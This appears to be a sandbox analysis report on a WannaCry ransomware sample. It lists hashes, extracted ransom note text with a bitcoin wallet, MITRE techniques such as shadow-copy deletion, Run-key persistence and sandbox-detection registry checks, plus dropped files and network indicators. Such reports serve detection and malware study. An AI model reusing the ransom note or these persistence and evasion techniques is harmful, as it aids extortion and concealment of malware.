wannacry | b10c01a7256143b3abb1d6fe2115ecd651fe639bccadaf3dd88d1d68e1bf50c4

Resubmissions

10-11-2024 23:13

241110-27k7lazqcj 10

10-11-2024 23:09

241110-25grdszphn 6

Analysis

max time kernel
804s
max time network
805s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
10-11-2024 23:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

04e16c855515880799c8.exe
Size

8.2MB
MD5

36b488690c9707ce7535f89ecbf494ce
SHA1

eb4ba5cad20093988d2fa1380b157402e4f97717
SHA256

b10c01a7256143b3abb1d6fe2115ecd651fe639bccadaf3dd88d1d68e1bf50c4
SHA512

26c95b5a5a5313575a1237bc66fc2dcb1560f216d54bade0985bcc8ee8df3f80457f3a979d0d1349fc2e14a5e7352c2a1e55f69a1acb5e7fa16da77497c2255d
SSDEEP

196608:hT0JUsBIIbr03TNMM06YxuHCFhIL1yLmj+Bfu0Qgfe/q+MMF1o:x0JU85kD6MFniFs1/jGNKZMMF1o

Score

10^/10

wannacry defense_evasion discovery execution impact motw persistence phishing ransomware worm

Malware Config

Extracted

Path

C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �

Wallets

12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw

Signatures

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Wannacry family
wannacry
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Downloads MZ/PE file
A potential corporate email address has been identified in the URL: [email protected]
phishing
A potential corporate email address has been identified in the URL: [email protected]
phishing

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

PCHelpSoftDriverUpdater.exePCHelpSoftDriverUpdater.exePCHelpSoftDriverUpdater.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation	PCHelpSoftDriverUpdater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation	PCHelpSoftDriverUpdater.exe
Key value queried	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation	PCHelpSoftDriverUpdater.exe

Drops startup file 2 IoCs

Processes:

ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD9ACA.tmp	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD9AE1.tmp	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Executes dropped EXE 30 IoCs

Processes:

Driver_Updater_setup.exeDriver_Updater_setup.exeDriver_Updater_setup.exeDriver_Updater_setup.tmpDriver_Updater_setup.tmpDriver_Updater_setup.tmpPCHelpSoftDriverUpdater.exePCHelpSoftDriverUpdater.exeDriverPro.exePCHelpSoftDriverUpdater.exePCHelpSoftDriverUpdater.exetaskdl.exe@[email protected]@[email protected]taskhsvc.exetaskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exe

pid	process
5956	Driver_Updater_setup.exe
4156	Driver_Updater_setup.exe
1896	Driver_Updater_setup.exe
3972	Driver_Updater_setup.tmp
4448	Driver_Updater_setup.tmp
4436	Driver_Updater_setup.tmp
1036	PCHelpSoftDriverUpdater.exe
6720	PCHelpSoftDriverUpdater.exe
6988	DriverPro.exe
3316	PCHelpSoftDriverUpdater.exe
1036	PCHelpSoftDriverUpdater.exe
5348	taskdl.exe
3380	@[email protected]
3064	@[email protected]
5676	taskhsvc.exe
4464	taskdl.exe
4252	taskse.exe
5420	@[email protected]
7088	taskdl.exe
6588	taskse.exe
3484	@[email protected]
7100	taskdl.exe
2316	taskse.exe
3076	@[email protected]
5732	taskse.exe
2148	@[email protected]
3000	taskdl.exe
4152	taskse.exe
1148	@[email protected]
3200	taskdl.exe

Loads dropped DLL 18 IoCs

Processes:

PCHelpSoftDriverUpdater.exePCHelpSoftDriverUpdater.exeDriverPro.exePCHelpSoftDriverUpdater.exePCHelpSoftDriverUpdater.exetaskhsvc.exe

pid	process
1036	PCHelpSoftDriverUpdater.exe
6720	PCHelpSoftDriverUpdater.exe
6988	DriverPro.exe
6720	PCHelpSoftDriverUpdater.exe
3316	PCHelpSoftDriverUpdater.exe
6720	PCHelpSoftDriverUpdater.exe
6720	PCHelpSoftDriverUpdater.exe
1036	PCHelpSoftDriverUpdater.exe
5676	taskhsvc.exe
5676	taskhsvc.exe
5676	taskhsvc.exe
5676	taskhsvc.exe
5676	taskhsvc.exe
5676	taskhsvc.exe
5676	taskhsvc.exe
5676	taskhsvc.exe
5676	taskhsvc.exe
5676	taskhsvc.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exe

pid process

4748 icacls.exe

pid	process
4748	icacls.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\pdyantnatxy168 = "\"C:\\Users\\Admin\\Downloads\\Ransomware.WannaCry\\tasksche.exe\""	reg.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

Processes:

flow	ioc
1133	raw.githubusercontent.com
991	camo.githubusercontent.com
1130	raw.githubusercontent.com
1131	raw.githubusercontent.com
1132	raw.githubusercontent.com

Mark of the Web detected: This indicates that the page was originally saved or cloned. 1 IoCs
phishing motw

Processes:

flow ioc

429 https://storage.googleapis.com/script.aniview.com/ssync/62f53b2c7850d0786f227f64/ssync.html

flow	ioc
429	https://storage.googleapis.com/script.aniview.com/ssync/62f53b2c7850d0786f227f64/ssync.html

Checks system information in the registry 2 TTPs 2 IoCs

System information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

PCHelpSoftDriverUpdater.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	PCHelpSoftDriverUpdater.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	PCHelpSoftDriverUpdater.exe

Drops file in System32 directory 2 IoCs

Processes:

PCHelpSoftDriverUpdater.exe

description	ioc	process
File created	C:\Windows\System32\DriverStore\FileRepository\machine.inf_amd64_72ab89a5cc3218be\machine.PNF	PCHelpSoftDriverUpdater.exe
File created	C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_amd64_f6ccd5b2c8226c4a\mshdc.PNF	PCHelpSoftDriverUpdater.exe

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

@[email protected]ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	@[email protected]
Set value (str)	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

04e16c855515880799c8.exe

pid process

5304 04e16c855515880799c8.exe
5304 04e16c855515880799c8.exe

Drops file in Program Files directory 64 IoCs

Processes:

DriverPro.exeDriver_Updater_setup.tmpsetup.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\Russian.ini	DriverPro.exe
File created	C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\is-ML3ON.tmp	Driver_Updater_setup.tmp
File created	C:\Program Files (x86)\PC HelpSoft Driver Updater\is-HQJ2N.tmp	Driver_Updater_setup.tmp
File created	C:\Program Files (x86)\PC HelpSoft Driver Updater\is-BL1GI.tmp	Driver_Updater_setup.tmp
File opened for modification	C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\Korean.ini	DriverPro.exe
File created	C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\is-VJVU5.tmp	Driver_Updater_setup.tmp
File created	C:\Program Files (x86)\PC HelpSoft Driver Updater\is-NIJF7.tmp	Driver_Updater_setup.tmp
File opened for modification	C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\Spanish.ini	DriverPro.exe
File opened for modification	C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\Polish.ini	DriverPro.exe
File created	C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\is-1BMBE.tmp	Driver_Updater_setup.tmp
File created	C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\is-JLO0I.tmp	Driver_Updater_setup.tmp
File created	C:\Program Files (x86)\PC HelpSoft Driver Updater\is-8EIJO.tmp	Driver_Updater_setup.tmp
File opened for modification	C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\Italian.ini	DriverPro.exe
File created	C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\is-6MNV6.tmp	Driver_Updater_setup.tmp
File created	C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\is-KJVN7.tmp	Driver_Updater_setup.tmp
File opened for modification	C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\Danish.ini	DriverPro.exe
File created	C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\is-5DMU1.tmp	Driver_Updater_setup.tmp
File created	C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\is-R5RGM.tmp	Driver_Updater_setup.tmp
File created	C:\Program Files (x86)\PC HelpSoft Driver Updater\is-MATBC.tmp	Driver_Updater_setup.tmp
File created	C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\is-SB0GC.tmp	Driver_Updater_setup.tmp
File opened for modification	C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\Settings.ini	DriverPro.exe
File opened for modification	C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\HDMSchedule.exe	Driver_Updater_setup.tmp
File created	C:\Program Files (x86)\PC HelpSoft Driver Updater\is-N4KHG.tmp	Driver_Updater_setup.tmp
File created	C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\is-BILJT.tmp	Driver_Updater_setup.tmp
File created	C:\Program Files (x86)\PC HelpSoft Driver Updater\is-SQ2IL.tmp	Driver_Updater_setup.tmp
File created	C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\is-2Q53O.tmp	Driver_Updater_setup.tmp
File created	C:\Program Files (x86)\PC HelpSoft Driver Updater\is-MA649.tmp	Driver_Updater_setup.tmp
File created	C:\Program Files (x86)\PC HelpSoft Driver Updater\is-78609.tmp	Driver_Updater_setup.tmp
File opened for modification	C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\DriverPro.exe	Driver_Updater_setup.tmp
File opened for modification	C:\Program Files (x86)\PC HelpSoft Driver Updater\7z.dll	Driver_Updater_setup.tmp
File created	C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\is-J04SN.tmp	Driver_Updater_setup.tmp
File created	C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\is-6JUGP.tmp	Driver_Updater_setup.tmp
File opened for modification	C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\Norwegian.ini	DriverPro.exe
File created	C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\is-V3P36.tmp	Driver_Updater_setup.tmp
File created	C:\Program Files (x86)\PC HelpSoft Driver Updater\is-FCHBE.tmp	Driver_Updater_setup.tmp
File created	C:\Program Files (x86)\PC HelpSoft Driver Updater\is-L06EB.tmp	Driver_Updater_setup.tmp
File opened for modification	C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\German.ini	DriverPro.exe
File created	C:\Program Files (x86)\PC HelpSoft Driver Updater\unins000.dat	Driver_Updater_setup.tmp
File created	C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\is-QTURA.tmp	Driver_Updater_setup.tmp
File created	C:\Program Files (x86)\PC HelpSoft Driver Updater\is-BRQQL.tmp	Driver_Updater_setup.tmp
File created	C:\Program Files (x86)\PC HelpSoft Driver Updater\is-GR5R3.tmp	Driver_Updater_setup.tmp
File created	C:\Program Files (x86)\PC HelpSoft Driver Updater\is-HIAB0.tmp	Driver_Updater_setup.tmp
File created	C:\Program Files (x86)\PC HelpSoft Driver Updater\unins000.msg	Driver_Updater_setup.tmp
File opened for modification	C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\English.ini	DriverPro.exe
File opened for modification	C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\Swedish.ini	DriverPro.exe
File created	C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\is-QPVBU.tmp	Driver_Updater_setup.tmp
File created	C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\is-M92E9.tmp	Driver_Updater_setup.tmp
File created	C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\is-VBO9I.tmp	Driver_Updater_setup.tmp
File created	C:\Program Files (x86)\PC HelpSoft Driver Updater\is-74GF2.tmp	Driver_Updater_setup.tmp
File opened for modification	C:\Program Files (x86)\PC HelpSoft Driver Updater\PlayaSDK.dll	Driver_Updater_setup.tmp
File created	C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\is-OR2S7.tmp	Driver_Updater_setup.tmp
File created	C:\Program Files (x86)\PC HelpSoft Driver Updater\is-RC6DT.tmp	Driver_Updater_setup.tmp
File opened for modification	C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\Dutch.ini	DriverPro.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\6b8484da-22c6-429d-8149-c1d3d7c86ca1.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20241110231455.pma	setup.exe
File opened for modification	C:\Program Files (x86)\PC HelpSoft Driver Updater\stub64.exe	Driver_Updater_setup.tmp
File opened for modification	C:\Program Files (x86)\PC HelpSoft Driver Updater\PCHelpSoftDriverUpdater.exe	Driver_Updater_setup.tmp
File created	C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\is-11AFR.tmp	Driver_Updater_setup.tmp
File created	C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\is-UFKNB.tmp	Driver_Updater_setup.tmp
File created	C:\Program Files (x86)\PC HelpSoft Driver Updater\is-V48L3.tmp	Driver_Updater_setup.tmp
File opened for modification	C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\Brazilian.ini	DriverPro.exe
File created	C:\Program Files (x86)\PC HelpSoft Driver Updater\Extra\is-TQH4R.tmp	Driver_Updater_setup.tmp
File created	C:\Program Files (x86)\PC HelpSoft Driver Updater\is-GHOD5.tmp	Driver_Updater_setup.tmp
File created	C:\Program Files (x86)\PC HelpSoft Driver Updater\is-6T576.tmp	Driver_Updater_setup.tmp

Drops file in Windows directory 7 IoCs

Processes:

PCHelpSoftDriverUpdater.exechrome.exe

description	ioc	process
File created	C:\Windows\INF\c_volume.PNF	PCHelpSoftDriverUpdater.exe
File created	C:\Windows\INF\c_monitor.PNF	PCHelpSoftDriverUpdater.exe
File created	C:\Windows\INF\c_media.PNF	PCHelpSoftDriverUpdater.exe
File created	C:\Windows\INF\c_diskdrive.PNF	PCHelpSoftDriverUpdater.exe
File created	C:\Windows\INF\c_display.PNF	PCHelpSoftDriverUpdater.exe
File created	C:\Windows\INF\c_processor.PNF	PCHelpSoftDriverUpdater.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 43 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

schtasks.exetaskdl.exetaskse.exe@[email protected]Driver_Updater_setup.exeDriver_Updater_setup.tmped01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exetaskdl.execmd.exe@[email protected]Driver_Updater_setup.tmpPCHelpSoftDriverUpdater.exetaskdl.exetaskse.exetaskdl.exeschtasks.exeattrib.exetaskdl.exe@[email protected]Driver_Updater_setup.exePCHelpSoftDriverUpdater.exe@[email protected]cmd.exeWMIC.exe@[email protected]taskse.exeDriver_Updater_setup.exeDriver_Updater_setup.tmpDriverPro.exePCHelpSoftDriverUpdater.execmd.exetaskse.exePCHelpSoftDriverUpdater.exeattrib.exeicacls.exe@[email protected]taskhsvc.exereg.execscript.execmd.exetaskse.exe@[email protected]taskdl.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Driver_Updater_setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Driver_Updater_setup.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Driver_Updater_setup.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PCHelpSoftDriverUpdater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Driver_Updater_setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PCHelpSoftDriverUpdater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Driver_Updater_setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Driver_Updater_setup.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DriverPro.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PCHelpSoftDriverUpdater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PCHelpSoftDriverUpdater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskhsvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

PCHelpSoftDriverUpdater.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0065\	PCHelpSoftDriverUpdater.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0002\	PCHelpSoftDriverUpdater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\000E	PCHelpSoftDriverUpdater.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0009\	PCHelpSoftDriverUpdater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0004	PCHelpSoftDriverUpdater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0065	PCHelpSoftDriverUpdater.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	PCHelpSoftDriverUpdater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004	PCHelpSoftDriverUpdater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\000E	PCHelpSoftDriverUpdater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0003	PCHelpSoftDriverUpdater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0004	PCHelpSoftDriverUpdater.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Capabilities	PCHelpSoftDriverUpdater.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags	PCHelpSoftDriverUpdater.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Capabilities	PCHelpSoftDriverUpdater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	PCHelpSoftDriverUpdater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0002	PCHelpSoftDriverUpdater.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\UINumberDescFormat	PCHelpSoftDriverUpdater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	PCHelpSoftDriverUpdater.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\	PCHelpSoftDriverUpdater.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0064\	PCHelpSoftDriverUpdater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	PCHelpSoftDriverUpdater.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs	PCHelpSoftDriverUpdater.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\	PCHelpSoftDriverUpdater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0003	PCHelpSoftDriverUpdater.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\	PCHelpSoftDriverUpdater.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Phantom	PCHelpSoftDriverUpdater.exe
